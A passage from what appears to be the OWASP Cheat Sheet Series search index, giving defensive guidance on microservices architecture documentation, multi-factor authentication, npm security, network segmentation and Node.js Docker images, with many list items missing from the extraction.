Collected information may be useful for doing application security practices, e.g. during defining security requirements, threat modeling or security testing. Sections below contains examples of activities related to securing application architecture (as well as its mapping to OWASP projects) and tips for their implementation using information collected above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#attack-surface-analysis","title":"Attack surface analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips","title":"Implementation tips","text":"

To enumerate microservices endpoints that need to be tested during security testing and analyzed during threat modeling analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#data-leakage-analysis","title":"Data leakage analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_1","title":"Implementation tips","text":"

To analyze possible data leakage analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_1","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#applications-trust-boundaries-components-and-significant-data-flows-justification","title":"Application's trust boundaries, components, and significant data flows justification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_2","title":"Implementation tips","text":"

To verify documentation and justification of all the application's trust boundaries, components, and significant data flows analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_2","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#analysis-of-the-applications-high-level-architecture","title":"Analysis of the application's high-level architecture","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_3","title":"Implementation tips","text":"

To verify definition and security analysis of the application's high-level architecture and all connected remote services analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_3","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-of-centralized-security-controls-verification","title":"Implementation of centralized security controls verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_4","title":"Implementation tips","text":"

To verify implementation of centralized, simple (economy of design), vetted, secure, and reusable security controls to avoid duplicate, missing, ineffective, or insecure controls analyze data collected under the section \"Identify and describe infrastructure services\".

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_4","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#enforcement-of-the-principle-of-least-privilege","title":"Enforcement of the principle of least privilege","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_5","title":"Implementation tips","text":"

To define minimally needed microservice permissions analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_5","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#sensitive-data-identification-and-classification","title":"Sensitive data identification and classification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_6","title":"Implementation tips","text":"

To verify that all sensitive data is identified and classified into protection levels analyze data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_6","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#application-components-businesssecurity-functions-verification","title":"Application components business/security functions verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_7","title":"Implementation tips","text":"

To verify the definition and documentation of all application components in terms of the business or security functions they provide analyze data collected under the following sections (parameter \"Short description\"):

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_7","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html","title":"Multi-Factor Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Multi-Factor authentication (MFA), or Two-Factor Authentication (2FA) is when a user is required to present more than one type of evidence in order to authenticate on a system. There are four different types of evidence (or factors) that can be used, listed in the table below:

Factor Examples Something You Know Passwords, PINs and security questions. Something You Have Hardware or software tokens, certificates, email, SMS and phone calls. Something You Are Fingerprints, facial recognition, iris scans and handprint scans. Location Source IP ranges and geolocation

It should be emphasised that while requiring multiple examples of a single factor (such as needing both a password and a PIN) does not constitute MFA, although it may provide some security benefits over a simple password.

Additionally, while the following sections discuss the disadvantage and weaknesses of various different types of MFA, in many cases these are only relevant against targeted attacks. Any MFA is better than no MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#advantages","title":"Advantages","text":"

The most common way that user accounts get compromised on applications is through weak, re-used or stolen passwords. Despite any technical security controls implemented on the application, users are liable to choose weak passwords, or to use the same password on different applications. As developers or system administrators, it should be assumed that users' passwords will be compromised at some point, and the system should be designed in order to defend against this.

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including brute-force, credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

The biggest disadvantage of MFA is the increase in management complexity for both administrators and end users. Many less technical users may find it difficult to configure and use MFA. Additionally, there are a number of other common issues encountered:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#quick-recommendations","title":"Quick Recommendations","text":"

Exactly when and how MFA is implemented in an application will vary on a number of different factors, including the threat model of the application, the technical level of the users, and the level of administrative control over the users. These need to be considered on a per-application basis.

However, the following recommendations are generally appropriate for most applications, and provide an initial starting point to consider.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#implementing-mfa","title":"Implementing MFA","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#when-to-require-mfa","title":"When to Require MFA","text":"

The most important place to require MFA on an application is when the user logs in. However, depending on the functionality available, it may also be appropriate to require MFA for performing sensitive actions, such as:

If the application provides multiple ways for a user to authenticate these should all require MFA, or have other protections implemented. A common area that is missed is if the application provides a separate API that can be used to login, or has an associated mobile application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#improving-usability","title":"Improving Usability","text":"

Having to frequently login with MFA creates an additional burden for users, and may cause them to disable MFA on the application. A number of mechanisms can be used to try and reduce the level of annoyance that MFA causes. However, these types of measures do decrease the security provided by MFA, so need to be risk assessed to find a reasonable balance of security and usability for the application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#failed-login-attempts","title":"Failed Login Attempts","text":"

When a user enters their password, but fails to authenticate using a second factor, this could mean one of two things:

There are a number of steps that should be taken when this occurs:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#resetting-mfa","title":"Resetting MFA","text":"

One of the biggest challenges with implementing MFA is handling users who forget or lose their second factors. There are many ways this could happen, such as:

In order to prevent users from being locked out of the application, there needs to be a mechanism for them to regain access to their account if they can't use their existing MFA; however it is also crucial that this doesn't provide an attacker with a way to bypass MFA and hijack their account.

There is no definitive \"best way\" to do this, and what is appropriate will vary hugely based on the security of the application, and also the level of control over the users. Solutions that work for a corporate application where all the staff know each other are unlikely to be feasible for a publicly available application with thousands of users all over the world. Every recovery method has its own advantages and disadvantages, and these need to be evaluated in the context of the application.

Some suggestions of possible methods include:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-know","title":"Something You Know","text":"

The most common type of authentication is based on something the users knows - typically a password. The biggest advantage of this factor is that it has very low requirements for both the developers and the end user, as it does not require any special hardware, or integration with other services.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#passwords-and-pins","title":"Passwords and PINs","text":"

Passwords and PINs are the most common form of authentication due to the simplicity of implementing them. The Authentication Cheat Sheet has guidance on how to implement a strong password policy, and the Password Storage Cheat Sheet has guidance on how to securely store passwords.

Most multi-factor authentication systems make use of a password, as well as at least one other factor.

It should be noted that PINs, \"secret words\" and other similar type of information are all effectively the same as passwords. Using two different types of passwords does not constitute MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions require the user to choose (or create) a number of questions that only they will know the answer to. These are effectively the same as passwords, although they are generally considered weaker. The Choosing and Using Security Questions Cheat Sheet contains further guidance on how to implement these securely.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_1","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_1","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-have","title":"Something You Have","text":"

The second factor is something that the user possesses. This could be a physical item (such as a hardware token), a digital item (such as a certificate or private key), or based on the ownership of a mobile phone, phone number, or email address (such as SMS or a software token installed on the phone, or an email with a single-use verification code).

If properly implemented then this can be significantly more difficult for a remote attacker to compromise; however it also creates an additional administrative burden on the user, as they must keep the authentication factor with them whenever they wish to use it.

The requirement to have a second factor can also limit certain types of users' ability to access a service. For example, if a user does not have access to a mobile phone, many types of MFA will not be available for them.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-otp-tokens","title":"Hardware OTP Tokens","text":"

Physical hardware OTP tokens can be used which generate constantly changing numeric codes, which must be submitted when authentication on the application. Most well-known of these is the RSA SecureID, which generates a six digit number that changes every 60 seconds.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_2","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_2","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#software-totp-tokens","title":"Software TOTP Tokens","text":"

A cheaper and easier alternative to hardware tokens is using software to generate Time-based One Time Password (TOTP) codes. This would typically involve the user installing a TOTP application on their mobile phone, and then scanning a QR code provided by the web application which provides the initial seed. The authenticator app then generates a six digit number every 60 seconds, in much the same way as a hardware token.

Most websites use standardized TOTP tokens, allowing the user to install any authenticator app that supports TOTP. However, a small number of applications use their own variants of this (such as Symantec), which requires the users to install a specific app in order to use the service. This should be avoided in favour of a standards-based approach.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_3","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_3","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-u2f-tokens","title":"Hardware U2F Tokens","text":"

Hardware U2F tokens communicate with the users workstation over USB or NFC, and implement challenge-response based authentication, rather than requiring the user to manually enter the code. This would typically be done by the user pressing a button on the token, or tapping it against their NFC reader.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_4","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_4","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#certificates","title":"Certificates","text":"

Digital certificates are files that are stored on the user's device which are automatically provided alongside the user's password when authenticating. The most common type is X.509 certificates (discussed in the Transport Layer Protection Cheat Sheet), more commonly known as client certificates.

Certificates are supported by all major web browsers, and once installed require no further interaction from the user. The certificates should be linked to an individual's user account in order to prevent users from trying to authenticate against other accounts.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_5","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_5","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#smartcards","title":"Smartcards","text":"

Smartcards are credit-card size cards with a chip containing a digital certificate for the user, which is unlocked with a PIN. They are commonly used for operating system authentication, but are rarely used in web applications.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_6","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_6","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#sms-messages-and-phone-calls","title":"SMS Messages and Phone Calls","text":"

SMS messages or phone calls can be used to provide users with a single-use code that they must submit as a second factor.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_7","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_7","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#email","title":"Email","text":"

Email verification requires that the user enters a code or clicks a link sent to their email address. There is some debate as to whether email constitutes a form of MFA, because if the user does not have MFA configured on their email account, it simply requires knowledge of the user's email password (which is often the same as their application password). However, it is included here for completeness.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_8","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_8","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-are","title":"Something You Are","text":"

The final factor in the traditional view of MFA is something you are - which is one of the physical attributes of the users (often called biometrics). Biometrics are rarely used in web applications due to the requirement for users to have specific hardware.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#biometrics","title":"Biometrics","text":"

The are a number of common types of biometrics that are used, including:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_9","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_9","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#location","title":"Location","text":"

The use of location as a fourth factor for MFA is not fully accepted; however, it is increasingly be used for authentication. It is sometimes argued that location is used when deciding whether or not to require MFA (as discussed above) however this is effectively the same as considering it to be a factor in its own right. Two prominent examples of this are the Conditional Access Policies available in Microsoft Azure, and the Network Unlock functionality in BitLocker.

When talking about location, access to the application that the user is authenticating against is not usually considered (as this would always be the case, and as such is relatively meaningless).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#source-ip-ranges","title":"Source IP Ranges","text":"

The source IP address the user is connecting from can be used as a factor, typically in an allow-list based approach. This could either be based on a static list (such as corporate office ranges) or a dynamic list (such as previous IP addresses the user has authenticated from).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_10","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_10","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#geolocation","title":"Geolocation","text":"

Rather than using the exact IP address of the user, the geographic location that the IP address is registered to can be used. This is less precise, but may be more feasible to implement in environments where IP addresses are not static. A common usage would be to require additional authentication factors when an authentication attempt is made from outside of the user's normal country.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_11","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_11","title":"Cons","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html","title":"NPM Security best practices","text":"

In the following npm cheatsheet, we\u2019re going to focus on 10 npm security best practices and productivity tips, useful for JavaScript and Node.js developers.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#1-avoid-publishing-secrets-to-the-npm-registry","title":"1) Avoid publishing secrets to the npm registry","text":"

Whether you\u2019re making use of API keys, passwords or other secrets, they can very easily end up leaking into source control or even a published package on the public npm registry. You may have secrets in your working directory in designated files such as a .env which should be added to a .gitignore to avoid committing it to a SCM, but what happen when you publish an npm package from the project\u2019s directory?

The npm CLI packs up a project into a tar archive (tarball) in order to push it to the registry. The following criteria determine which files and directories are added to the tarball:

Developers may end up updating the .gitignore file, but forget to update .npmignore as well, which can lead to a potentially sensitive file not being pushed to source control, but still being included in the npm package.

Another good practice to adopt is making use of the files property in package.json, which works as a whitelist and specifies the array of files to be included in the package that is to be created and installed (while the ignore file functions as a blacklist). The files property and an ignore file can both be used together to determine which files should explicitly be included, as well as excluded, from the package. When using both, the former the files property in package.json takes precedence over the ignore file.

When a package is published, the npm CLI will verbosely display the archive being created. To be extra careful, add a --dry-run command-line argument to your publish command in order to first review how the tarball is created without actually publishing it to the registry.

In January 2019, npm shared on their blog that they added a mechanism that automatically revokes a token if they detect that one has been published with a package.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#2-enforce-the-lockfile","title":"2) Enforce the lockfile","text":"

We embraced the birth of package lockfiles with open arms, which introduced: deterministic installations across different environments, and enforced dependency expectations across team collaboration. Life is good! Or so I thought\u2026 what would have happened had I slipped a change into the project\u2019s package.json file but had forgotten to commit the lockfile along side of it?

Both Yarn, and npm act the same during dependency installation . When they detect an inconsistency between the project\u2019s package.json and the lockfile, they compensate for such change based on the package.json manifest by installing different versions than those that were recorded in the lockfile.

This kind of situation can be hazardous for build and production environments as they could pull in unintended package versions and render the entire benefit of a lockfile futile.

Luckily, there is a way to tell both Yarn and npm to adhere to a specified set of dependencies and their versions by referencing them from the lockfile. Any inconsistency will abort the installation. The command-line should read as follows:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#3-minimize-attack-surfaces-by-ignoring-run-scripts","title":"3) Minimize attack surfaces by ignoring run-scripts","text":"

The npm CLI works with package run-scripts. If you\u2019ve ever run npm start or npm test then you\u2019ve used package run-scripts too. The npm CLI builds on scripts that a package can declare, and allows packages to define scripts to run at specific entry points during the package\u2019s installation in a project. For example, some of these script hook entries may be postinstall scripts that a package that is being installed will execute in order to perform housekeeping chores.

With this capability, bad actors may create or alter packages to perform malicious acts by running any arbitrary command when their package is installed. A couple of cases where we\u2019ve seen this already happening is the popular eslint-scope incident that harvested npm tokens, and the crossenv incident, along with 36 other packages that abused a typosquatting attack on the npm registry.

Apply these npm security best practices in order to minimize the malicious module attack surface:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#4-assess-npm-project-health","title":"4) Assess npm project health","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-outdated-command","title":"npm outdated command","text":"

Rushing to constantly upgrade dependencies to their latest releases is not necessarily a good practice if it is done without reviewing release notes, the code changes, and generally testing new upgrades in a comprehensive manner. With that said, staying out of date and not upgrading at all, or after a long time, is a source for trouble as well.

The npm CLI can provide information about the freshness of dependencies you use with regards to their semantic versioning offset. By running npm outdated, you can see which packages are out of date. Dependencies in yellow correspond to the semantic versioning as specified in the package.json manifest, and dependencies colored in red mean that there\u2019s an update available. Furthermore, the output also shows the latest version for each dependency.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-doctor-command","title":"npm doctor command","text":"

Between the variety of Node.js package managers, and different versions of Node.js you may have installed in your path, how do you verify a healthy npm installation and working environment? Whether you\u2019re working with the npm CLI in a development environment or within a CI, it is important to assess that everything is working as expected.

Call the doctor! The npm CLI incorporates a health assessment tool to diagnose your environment for a well-working npm interaction. Run npm doctor to review your npm setup:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#5-audit-for-vulnerabilities-in-open-source-dependencies","title":"5) Audit for vulnerabilities in open source dependencies","text":"

The npm ecosystem is the single largest repository of application libraries amongst all the other language ecosystems. The registry and the libraries in it are at the core for JavaScript developers as they are able to leverage work that others have already built and incorporate it into their codebase. With that said, the increasing adoption of open source libraries in applications brings with it an increased risk of introducing security vulnerabilities.

Many popular npm packages have been found to be vulnerable and may carry a significant risk without proper security auditing of your project\u2019s dependencies. Some examples are npm request, superagent, mongoose, and even security-related packages like jsonwebtoken, and validator.

Security doesn\u2019t end by just scanning for security vulnerabilities when installing a package but should also be streamlined with developer workflows to be effectively adopted throughout the entire lifecycle of software development, and monitored continuously when code is deployed:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#6-use-a-local-npm-proxy","title":"6) Use a local npm proxy","text":"

The npm registry is the biggest collection of packages that is available for all JavaScript developers and is also the home of the most of the Open Source projects for web developers. But sometimes you might have different needs in terms of security, deployments or performance. When this is true, npm allows you to switch to a different registry:

When you run npm install, it automatically starts a communication with the main registry to resolve all your dependencies; if you wish to use a different registry, that too is pretty straightforward:

Verdaccio is a simple lightweight zero-config-required private registry and installing it is as simple as follows: $ npm install --global verdaccio.

Hosting your own registry was never so easy! Let\u2019s check the most important features of this tool:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#7-responsibly-disclose-security-vulnerabilities","title":"7) Responsibly disclose security vulnerabilities","text":"

When security vulnerabilities are found, they pose a potentially serious threat if publicly disclosed without prior warning or appropriate mitigation available for users to protect themselves.

It is recommended that security researchers follow a responsible disclosure program, which is a set of processes and guidelines that aims to connect the researchers with the vendor or maintainer of the vulnerable asset, in order to convey the vulnerability, it\u2019s impact and applicability. Once the vulnerability is correctly triaged, the vendor and researcher coordinate a fix and a publication date for the vulnerability in an effort to provide an upgrade-path or remediation for affected users before the security issue is made public.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#8-enable-2fa","title":"8) Enable 2FA","text":"

In October 2017, npm officially announced support for two-factor authentication (2FA) for developers using the npm registry to host their closed and open source packages.

Even though 2FA has been supported on the npm registry for a while now, it seems to be slowly adopted with one example being the eslint-scope incident in mid-2018 when a stolen developer account on the ESLint team lead to a malicious version of eslint-scope being published by bad actors.

Enabling 2FA is an easy and significant win for an npm security best practices. The registry supports two modes for enabling 2FA in a user\u2019s account:

Equip yourself with an authentication application, such as Google Authentication, which you can install on a mobile device, and you\u2019re ready to get started. One easy way to get started with the 2FA extended protection for your account is through npm\u2019s user interface, which allows enabling it very easily. If you\u2019re a command-line person, it\u2019s also easy to enable 2FA when using a supported npm client version (>=5.5.1):

npm profile enable-2fa auth-and-writes\n

Follow the command-line instructions to enable 2FA, and to save emergency authentication codes. If you wish to enable 2FA mode for login and profile changes only, you may replace the auth-and-writes with auth-only in the code as it appears above.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#9-use-npm-author-tokens","title":"9) Use npm author tokens","text":"

Every time you log in with the npm CLI, a token is generated for your user and authenticates you to the npm registry. Tokens make it easy to perform npm registry-related actions during CI and automated procedures, such as accessing private modules on the registry or publishing new versions from a build step.

Tokens can be managed through the npm registry website, as well as using the npm command-line client. An example of using the CLI to create a read-only token that is restricted to a specific IPv4 address range is as follows:

npm token create --read-only --cidr=192.0.2.0/24\n

To verify which tokens are created for your user or to revoke tokens in cases of emergency, you can use npm token list or npm token revoke respectively.

Ensure you are following this npm security best practice by protecting and minimizing the exposure of your npm tokens.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#10-understand-module-naming-conventions-and-typosquatting-attacks","title":"10) Understand module naming conventions and typosquatting attacks","text":"

Naming a module is the first thing you might do when creating a package, but before defining a final name, npm defines some rules that a package name must follow:

Typosquatting is an attack that relies on mistakes made by users, such as typos. With typosquatting, bad actors could publish malicious modules to the npm registry with names that look much like existing popular modules.

We have been tracking tens of malicious packages in the npm ecosystem; they have been seen on the PyPi Python registry as well. Perhaps some of the most popular incidents have been for cross-env, event-stream, and eslint-scope.

One of the main targets for typosquatting attacks are the user credentials, since any package has access to environment variables via the global variable process.env. Other examples we\u2019ve seen in the past include the case with event-stream, where the attack targeted developers in the hopes of injecting malicious code into an application\u2019s source code.

Closing our list of ten npm security best practices are the following tips to reduce the risk of such attacks:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html","title":"Network segmentation Cheat Sheet","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Network segmentation is the core of multi-layer defense in depth for modern services. Segmentation slow down an attacker if he cannot implement attacks such as:

The main goal of this cheat sheet is to show the basics of network segmentation to effectively counter attacks by building a secure and maximally isolated service network architecture.

Segmentation will avoid the following situations:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#content","title":"Content","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#schematic-symbols","title":"Schematic symbols","text":"

Elements used in network diagrams:

Crossing the border of the rectangle means crossing the firewall:

In the image above, traffic passes through two firewalls with the names FW1 and FW2

In the image above, traffic passes through one firewall, behind which there are two VLANs

Further, the schemes do not contain firewall icons so as not to overload the schemes

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#three-layer-network-architecture","title":"Three-layer network architecture","text":"

By default, developed information systems should consist of at least three components (security zones):

  1. FRONTEND;
  2. MIDDLEWARE;
  3. BACKEND.
"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#frontend","title":"FRONTEND","text":"

FRONTEND - A frontend is a set of segments with the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#middleware","title":"MIDDLEWARE","text":"

MIDDLEWARE - a set of segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#backend","title":"BACKEND","text":"

BACKEND - a set of network segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#example-of-three-layer-network-architecture","title":"Example of Three-layer network architecture","text":"

The following example shows an organization's local network. The organization is called \"\u0421ontoso\".

The edge firewall contains 2 VLANs of FRONTEND security zone:

The internal firewall contains 4 VLANs:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#interservice-interaction","title":"Interservice interaction","text":"

Usually some information systems of the company interact with each other. It is important to define a firewall policy for such interactions. The base allowed interactions are indicated by the green arrows in the image below: The image above also shows the allowed access from the FRONTEND and MIDDLEWARE segments to external networks (the Internet, for example).

From this image follows:

  1. Access between FRONTEND and MIDDLEWARE segments of different information systems is prohibited;
  2. Access from the MIDDLEWARE segment to the BACKEND segment of another service is prohibited (access to a foreign database bypassing the application server is prohibited).

Forbidden accesses are indicated by red arrows in the image below:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#many-applications-on-the-same-network","title":"Many applications on the same network","text":"

If you prefer to have fewer networks in your organization and host more applications on each network, it is acceptable to host the load balancer on those networks. This balancer will balance traffic to applications on the network. In this case, it will be necessary to open one port to such a network, and balancing will be performed, for example, based on the HTTP request parameters. An example of such segmentation:

As you can see, there is only one incoming access to each network, access is opened up to the balancer in the network. However, in this case, segmentation no longer works, access control between applications from different network segments is performed at the 7th level of the OSI model using a balancer.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#network-security-policy","title":"Network security policy","text":"

The organization must define a \"paper\" policy that describes firewall rules and basic allowed network access. This policy is at least useful:

It is convenient when the policy is described by similar images. The information is presented as concisely and simply as possible.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#examples-of-individual-policy-provisions","title":"Examples of individual policy provisions","text":"

Examples in the network policy will help colleagues quickly understand what access is potentially allowed and can be requested.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-cicd","title":"Permissions for CI/CD","text":"

The network security policy may define, for example, the basic permissions allowed for the software development system. Let's look at an example of what such a policy might look like:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#secure-logging","title":"Secure logging","text":"

It is important that in the event of a compromise of any information system, its logs are not subsequently modified by an attacker. To do this, you can do the following: copy the logs to a separate server, for example, using the syslog protocol, which does not allow an attacker to modify the logs, syslog only allows you to add new events to the logs. The network security policy for this activity looks like this: In this example, we are also talking about application logs that may contain security events, as well as potentially important events that may indicate an attack.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-monitoring-systems","title":"Permissions for monitoring systems","text":"

Suppose a company uses Zabbix as an IT monitoring system. In this case, the policy might look like this:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#useful-links","title":"Useful links","text":""},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html","title":"Node.js Docker Cheat Sheet","text":"

The following cheatsheet provides production-grade guidelines for building optimized and secure Node.js Docker. You\u2019ll find it helpful regardless of the Node.js application you aim to build. This article will be helpful for you if:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#1-use-explicit-and-deterministic-docker-base-image-tags","title":"1) Use explicit and deterministic Docker base image tags","text":"

It may seem to be an obvious choice to build your image based on the node Docker image, but what are you actually pulling in when you build the image? Docker images are always referenced by tags, and when you don\u2019t specify a tag the default, :latest tag is used.

So, in fact, by specifying the following in your Dockerfile, you always build the latest version of the Docker image that has been built by the Node.js Docker working group:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-node","title":"FROM node","text":"

The shortcomings of building based on the default node image are as follows:

  1. Docker image builds are inconsistent. Just like we\u2019re using lockfiles to get a deterministic npm install behavior every time we install npm packages, we\u2019d also like to get deterministic docker image builds. If we build the image from node\u2014which effectively means the node:latest tag\u2014then every build will pull a newly built Docker image of node. We don\u2019t want to introduce this sort of non-deterministic behavior.
